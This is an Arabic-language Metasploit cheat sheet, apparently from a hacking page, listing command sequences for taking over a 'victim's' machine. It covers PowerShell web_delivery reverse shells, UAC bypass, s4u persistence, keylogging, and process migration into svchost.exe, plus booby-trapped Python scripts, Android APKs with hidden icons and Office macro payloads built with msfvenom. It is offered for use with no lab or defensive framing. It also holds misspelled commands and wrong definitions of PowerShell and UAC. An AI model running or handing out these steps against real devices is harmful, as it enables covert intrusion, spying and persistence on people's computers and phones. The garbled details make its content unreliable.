Metasploit

Metasploit

PlusX4

______________________________________________________

أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery

+) ماهو Power Shell ؟

هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "

+) أوامر الأستغلال ~>

$ msfstart

$ msfconsole

$ use exploit/multi/script/web_delivery

$ show targets

$ set target <Numper Target>

$ set payload windows/meterpreter/reverse_tcp

$ set LHOST <ip>

$ set LPORT <port>

$ show option

$ exploit

$ session -i

$ session -i <Numper Session>

______________________________________________________

تخطي UAC باستغلال ثغرة ASK

+) ماهو UAC ؟

هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/ask

$ set LHOST <ip>

$ set LPORT <port>

$ set session <numper session target>

$ set TECHNIQUE < PSH / EXE >

$ exploit

$ getsystem

$ run post/windows/gather/win_prives

_____________________________________________________

استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/s4u_persistence

$ set session <numper session target>

$ set TRIGGER <even,lock,logon,schedule,unlock>

$ set LPORT <port>

$ exploit

______________________________________________________

اختراق الأجهزة بإستخدام سكربت بلغة الباثيون

+) صنع السكربت الملغم ~>

$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py

+) أوامر الأستغلال ~>

$ use exploit/multi/handler

$ set payload python/meterpreter/reverse_tcp

$ set LHOST <ip>

$ set LPORT <port>

$ exploit

______________________________________________________

اختراق الاندرويد عن طريق بايلود apk ملغم

+) صنع بايلود ملغم ~>

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk

+) الأستغلال ~>

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set LHOST <ip>

$ set LPORT <port>

$ exploit -x hide_app_icon

______________________________________________________

التنصت على لوحة مفاتيح الضحية

+) أوامر الأستغلال ~>

$ use post/windows/capture/keylog_recorder

$ set session <numper session target>

$ exploit

_____________________________________________________

نقل عملية الاختراق داخل proceess عند قتل البايلود

+) أوامر الأستغلال ~>

$ use payload/windows/meterprerter/reverse_tcp

$ show advanced

$ set prependmigrate true

$ set prependmigrateproc svchost.exe

$ set LHOST <ip>

$ set LPORT <port>

$ generate -t exe -f <path>

_____________________________________________________

تلغيم ملفات Microsoft Offic

+) أمر تلغيم ~>

$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe

+) أوامر الأستغلال ~>

$ use exploit/multi/handler

$ set payload windows/meterpreter/reverse_tcp

$ set LHOST <ip>

$ set LPORT <port>

$ exploit

_____________________________________________________


Report Page